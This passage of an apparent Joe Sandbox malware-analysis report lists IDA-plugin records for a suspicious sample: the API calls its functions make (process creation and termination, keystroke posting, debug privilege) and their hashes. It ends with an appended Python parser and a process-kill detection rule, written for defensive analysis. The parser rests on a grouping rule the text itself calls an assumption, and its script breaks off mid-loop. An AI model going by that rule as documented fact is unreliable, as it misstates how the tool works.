                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0084F910), ref: 00838D5C
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00838ED6
                                                        • SysFreeString.OLEAUT32(?), ref: 00838F00
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                        • String ID:
                                                        • API String ID: 560350794-0
                                                        • Opcode ID: 00eca7e0b2823461fb1b49545806edebd59c2ad7c6e8a29a75df24d4dd499be5
                                                        • Instruction ID: 4964ece23f6b717636a90b7cd02a2a9d7fecdbd6ae42d0ee38501558b41613ea
                                                        • Opcode Fuzzy Hash: 00eca7e0b2823461fb1b49545806edebd59c2ad7c6e8a29a75df24d4dd499be5
                                                        • Instruction Fuzzy Hash: 65F10871A00209EFDB14DF94C888EAEB7B9FF85314F108498F905EB251DB75AE45CB90
                                                        APIs
                                                        • _memset.LIBCMT ref: 0083F6B5
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0083F848
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0083F86C
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0083F8AC
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0083F8CE
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0083FA4A
                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0083FA7C
                                                        • CloseHandle.KERNEL32(?), ref: 0083FAAB
                                                        • CloseHandle.KERNEL32(?), ref: 0083FB22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: d48ccded8cb5401d1a143eecd140e62743e5baa20f9374c25a9361e0edcc6db6
                                                        • Instruction ID: 604f705eb7973b0ef7e54fa6eaa187ebe4c8a0818a1d2fedeb676db3e5c11f83
                                                        • Opcode Fuzzy Hash: d48ccded8cb5401d1a143eecd140e62743e5baa20f9374c25a9361e0edcc6db6
                                                        • Instruction Fuzzy Hash: 23E1AF31604241EFCB14EF24C885B6ABBE1FF89314F14856DF9998B2A2DB34DC45CB92
                                                        APIs
                                                          • Part of subcall function 0082466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00823697,?), ref: 0082468B
                                                          • Part of subcall function 0082466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00823697,?), ref: 008246A4
                                                          • Part of subcall function 00824A31: GetFileAttributesW.KERNEL32(?,0082370B), ref: 00824A32
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00824D40
                                                        • _wcscmp.LIBCMT ref: 00824D5A
                                                        • MoveFileW.KERNEL32(?,?), ref: 00824D75
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                        • String ID:
                                                        • API String ID: 793581249-0
                                                        • Opcode ID: 60a292ac7b94e986eb2408ce8f1820e6dcddfc2930187b95f5b3bed340e928ca
                                                        • Instruction ID: 010fe31a4ee9b30569433569c9e57f08ee3cf4ac4bc58bd4c4715f7b892799a5
                                                        • Opcode Fuzzy Hash: 60a292ac7b94e986eb2408ce8f1820e6dcddfc2930187b95f5b3bed340e928ca
                                                        • Instruction Fuzzy Hash: EC5163B21083959BC724DB64DC85DDB73ECEF84350F40192EF28AD3152EE35A589CB66
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007FC2F7
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007FC319
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007FC331
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007FC34F
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007FC370
                                                        • DestroyIcon.USER32(00000000), ref: 007FC37F
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007FC39C
                                                        • DestroyIcon.USER32(?), ref: 007FC3AB
                                                          • Part of subcall function 0084A4AF: DeleteObject.GDI32(00000000), ref: 0084A4E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                        • String ID:
                                                        • API String ID: 2819616528-0
                                                        • Opcode ID: 9b7513c7124af0b4ef3327e40ebe4f0395a4dac04ee617070fea7445f30b3c55
                                                        • Instruction ID: 3899e968fc4a8e6c151c32d064a246009dc18b81e681f505c26d41d85ec7da07
                                                        • Opcode Fuzzy Hash: 9b7513c7124af0b4ef3327e40ebe4f0395a4dac04ee617070fea7445f30b3c55
                                                        • Instruction Fuzzy Hash: 79516974600209EFDB24DF68CC45FAA7BA5FB18350F10452DFA02D72A1EB78AC91DB61
                                                        APIs
                                                          • Part of subcall function 0081A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0081A84C
                                                          • Part of subcall function 0081A82C: GetCurrentThreadId.KERNEL32 ref: 0081A853
                                                          • Part of subcall function 0081A82C: AttachThreadInput.USER32(00000000,?,00819683,?,00000001), ref: 0081A85A
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0081968E
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008196AB
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008196AE
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 008196B7
                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008196D5
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008196D8
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 008196E1
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008196F8
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008196FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: b69a69b996274e415dea1567f70fbaf52b593a1ad163468caa0208e32b1dfb6a
                                                        • Instruction ID: 02470b93763a9a71bab0072ccb5913ce93a9ed79bb5602e1953132cef96d5c4e
                                                        • Opcode Fuzzy Hash: b69a69b996274e415dea1567f70fbaf52b593a1ad163468caa0208e32b1dfb6a
                                                        • Instruction Fuzzy Hash: BE11E1B5910218BEF6106F64DC89FAA3B6DFF4D755F110429F344AB0A1C9F26C50DAA4
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0081853C,00000B00,?,?), ref: 0081892A
                                                        • HeapAlloc.KERNEL32(00000000,?,0081853C,00000B00,?,?), ref: 00818931
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0081853C,00000B00,?,?), ref: 00818946
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,0081853C,00000B00,?,?), ref: 0081894E
                                                        • DuplicateHandle.KERNEL32(00000000,?,0081853C,00000B00,?,?), ref: 00818951
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0081853C,00000B00,?,?), ref: 00818961
                                                        • GetCurrentProcess.KERNEL32(0081853C,00000000,?,0081853C,00000B00,?,?), ref: 00818969
                                                        • DuplicateHandle.KERNEL32(00000000,?,0081853C,00000B00,?,?), ref: 0081896C
                                                        • CreateThread.KERNEL32(00000000,00000000,00818992,00000000,00000000,00000000), ref: 00818986
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 3566d3b7af40ea6e99b46116a62c7307e225a54b57a389847931dfdf9735cfd7
                                                        • Instruction ID: 9b74ec8b4ea926acdc5dc4cfce7ca3c2d80b4d385d0a8687950f8a3b6dbe75d4
                                                        • Opcode Fuzzy Hash: 3566d3b7af40ea6e99b46116a62c7307e225a54b57a389847931dfdf9735cfd7
                                                        • Instruction Fuzzy Hash: 5701ACB9640304FFE611ABA5DC49F673BACFB89711F404425FB05DB191CA749800CA20
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: 79de19d1150837414eaa41fd653b453718c88dd57a6b54079417f7e90383c8c0
                                                        • Instruction ID: 1175a197c9487aa35e5ee5c82cbbcbc893896321c26c5f966f55af46bfed7ff2
                                                        • Opcode Fuzzy Hash: 79de19d1150837414eaa41fd653b453718c88dd57a6b54079417f7e90383c8c0
                                                        • Instruction Fuzzy Hash: 60C1A471A0021A9FDF10DF98D885BAEB7F9FF88314F148469E945EB281E7B09D45CB90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2862541840-625585964
                                                        • Opcode ID: c07876c58c8b196e282871919561b38432713cfc1c2fde15455e9967133bb43e
                                                        • Instruction ID: babe61c725ce27c0fe54c8b13900daf168a5f4f1da9638cf91504394ad481473
                                                        • Opcode Fuzzy Hash: c07876c58c8b196e282871919561b38432713cfc1c2fde15455e9967133bb43e
                                                        • Instruction Fuzzy Hash: 5A918A71A00219EBDF24DFA5C848FAFBBB8FF85714F108159E555EB280D7B09945CBA0
                                                        APIs
                                                          • Part of subcall function 0081710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?,?,00817455), ref: 00817127
                                                          • Part of subcall function 0081710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?), ref: 00817142
                                                          • Part of subcall function 0081710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?), ref: 00817150
                                                          • Part of subcall function 0081710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?), ref: 00817160
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00839806
                                                        • _memset.LIBCMT ref: 00839813
                                                        • _memset.LIBCMT ref: 00839956
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00839982
                                                        • CoTaskMemFree.OLE32(?), ref: 0083998D
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 008399DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1300414916-2785691316
                                                        • Opcode ID: c0b3faa79eccb6ecf11e29e1f3babf0225c2bdc8d940ff930cb863aed2aabed7
                                                        • Instruction ID: f64c902eb7c6acabb771263d3adee08ab7bea7bfb11903eae2cc2eb91c57fb67
                                                        • Opcode Fuzzy Hash: c0b3faa79eccb6ecf11e29e1f3babf0225c2bdc8d940ff930cb863aed2aabed7
                                                        • Instruction Fuzzy Hash: 61910571D00229EBDB10DFA5DC45EDEBBB9FF48310F20416AE519A7291DB71AA44CFA0
                                                        APIs
                                                          • Part of subcall function 007DFC86: _wcscpy.LIBCMT ref: 007DFCA9
                                                        • _memset.LIBCMT ref: 00822B87
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00822BB6
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00822C69
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00822C97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: (P$(P$0
                                                        • API String ID: 4152858687-3500901666
                                                        • Opcode ID: ae6ba64112bf1c3237b8ca2fa3c5e2f534e77dfcf71837f12174d3190c0a085b
                                                        • Instruction ID: 9f6d68003bffee5fa5bf360ba691b2dbe0852cdcc79e74da650f78271d2ce72f
                                                        • Opcode Fuzzy Hash: ae6ba64112bf1c3237b8ca2fa3c5e2f534e77dfcf71837f12174d3190c0a085b
                                                        • Instruction Fuzzy Hash: 9A51A071608321ABD725EF28E845A6F77E8FF99320F040A2DF895D6291DB74CD84C792
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00846E24
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00846E38
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00846E52
                                                        • _wcscat.LIBCMT ref: 00846EAD
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00846EC4
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00846EF2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: SysListView32
                                                        • API String ID: 307300125-78025650
                                                        • Opcode ID: 9db0f5d1cf8cf7dd75d295a76a8837d0de6889ad4f7ee8017efb75f5c4518598
                                                        • Instruction ID: 0b534e9dd5a736a8c39c8403c7ffa73bd141dd0e078337886cc83c54bf6bc798
                                                        • Opcode Fuzzy Hash: 9db0f5d1cf8cf7dd75d295a76a8837d0de6889ad4f7ee8017efb75f5c4518598
                                                        • Instruction Fuzzy Hash: 9341A274A0034CEBEB219F64CC85BEA77E8FF09350F10442AF694E7292E6769D94CB50
                                                        APIs
                                                          • Part of subcall function 00823C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00823C7A
                                                          • Part of subcall function 00823C55: Process32FirstW.KERNEL32(00000000,?), ref: 00823C88
                                                          • Part of subcall function 00823C55: CloseHandle.KERNEL32(00000000), ref: 00823D52
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0083E9A4
                                                        • GetLastError.KERNEL32 ref: 0083E9B7
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0083E9E6
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0083EA63
                                                        • GetLastError.KERNEL32(00000000), ref: 0083EA6E
                                                        • CloseHandle.KERNEL32(00000000), ref: 0083EAA3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: 333ab25a6a051fecc4061e0384365211e264a03d5ea5758731a479a09cfc05ba
                                                        • Instruction ID: efcb64148d8967f54ff54769c928c0103b853e451352519facc58cffdfc5627e
                                                        • Opcode Fuzzy Hash: 333ab25a6a051fecc4061e0384365211e264a03d5ea5758731a479a09cfc05ba
                                                        • Instruction Fuzzy Hash: 38418A31200211DFDB15EF18CCA9FAAB7A5FF91314F04841DFA469B2D2DB79A844CB96
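Added example, not code from Joe Sandbox or its IDA plugin: a small Python parser for the function records listed on this page. It reads the "APIs" lines of each record (including the "Part of subcall function" entries), rebuilds the readable half of the record's "API ID" from the API names, and checks the result against the ID the report prints. The grouping rule it applies is an assumption inferred from the records above, not something Joe Sandbox documents: split each API name on CamelCase, keep tokens of four or more characters, count the tokens, emit each count's tokens as one sorted group, and join the groups with "$" from most to least frequent. The numeric half of "API String ID" is a hash this example does not rebuild. The two records in SAMPLE are copied from the report text above; the KILL_PATTERN rule is the author's own illustration of the API set a process-termination check would key on, not a Joe Sandbox signature.

```python
"""Parse Joe Sandbox IDA-plugin function records and rebuild the readable
half of each record's "API ID" from the API names it lists.

Added example, not Joe Sandbox code. The grouping rule in rebuild_api_id is
an assumption inferred from the records on the report page (it is not
documented): CamelCase tokens of 4+ chars, counted, grouped by count,
each group sorted and concatenated, groups joined with '$' from the most to
the least frequent token. The numeric part of "API String ID" is not rebuilt.
"""
import re
from collections import Counter

# Two records copied from the report (the process-handle and the
# process-termination functions); only the lines the parser reads matter.
SAMPLE = """\
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0081853C,00000B00,?,?), ref: 0081892A
• HeapAlloc.KERNEL32(00000000,?,0081853C,00000B00,?,?), ref: 00818931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0081853C,00000B00,?,?), ref: 00818946
• GetCurrentProcess.KERNEL32(?,00000000,?,0081853C,00000B00,?,?), ref: 0081894E
• DuplicateHandle.KERNEL32(00000000,?,0081853C,00000B00,?,?), ref: 00818951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0081853C,00000B00,?,?), ref: 00818961
• GetCurrentProcess.KERNEL32(0081853C,00000000,?,0081853C,00000B00,?,?), ref: 00818969
• DuplicateHandle.KERNEL32(00000000,?,0081853C,00000B00,?,?), ref: 0081896C
• CreateThread.KERNEL32(00000000,00000000,00818992,00000000,00000000,00000000), ref: 00818986
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
APIs
  • Part of subcall function 00823C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00823C7A
  • Part of subcall function 00823C55: Process32FirstW.KERNEL32(00000000,?), ref: 00823C88
  • Part of subcall function 00823C55: CloseHandle.KERNEL32(00000000), ref: 00823D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0083E9A4
• GetLastError.KERNEL32 ref: 0083E9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0083E9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0083EA63
• GetLastError.KERNEL32(00000000), ref: 0083EA6E
• CloseHandle.KERNEL32(00000000), ref: 0083EAA3
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
"""

# "• Name.MODULE(args), ref: addr", optionally prefixed by "Part of subcall function X:"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_]\w*)\.([A-Z0-9]+)"
)
TOKEN = re.compile(r"[A-Z][a-z0-9]+")  # CamelCase pieces, digits allowed (Toolhelp32)

# Illustrative rule (not a Joe Sandbox signature): enumerating processes and
# opening them with PROCESS_TERMINATE (0x1) before TerminateProcess is the
# API set a "terminates other processes" check would look for.
KILL_PATTERN = {"CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess"}


def parse_records(text):
    """Split the flat report text into records; each starts at an 'APIs' heading."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"apis": [], "api_id": "", "string_id": ""}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            cur["apis"].append(m.group(1))
        elif s.startswith("• API ID:"):
            cur["api_id"] = s[len("• API ID:"):].strip()
        elif s.startswith("• String ID:"):
            cur["string_id"] = s[len("• String ID:"):].strip()
    return records


def tokens(api):
    """CamelCase tokens of 4+ chars; CRT/lowercase names stay whole minus a W/A suffix."""
    toks = [t for t in TOKEN.findall(api) if len(t) >= 4]
    if toks:
        return toks
    return [api[:-1] if len(api) > 1 and api[-1] in "WA" else api]


def rebuild_api_id(api_names):
    """Assumed rule: token groups by descending count, each sorted and concatenated."""
    counts = Counter(t for api in api_names for t in tokens(api))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def verify(text):
    """(reported API ID, rebuilt API ID, match?) for every record in text."""
    out = []
    for rec in parse_records(text):
        rebuilt = rebuild_api_id(rec["apis"])
        out.append((rec["api_id"], rebuilt, rebuilt == rec["api_id"]))
    return out


def flags_process_kill(record):
    """True when the record's API set contains the snapshot/open/terminate trio."""
    return KILL_PATTERN <= set(record["apis"])


if __name__ == "__main__":
    for rec, (reported, rebuilt, ok) in zip(parse_records(SAMPLE), verify(SAMPLE)):
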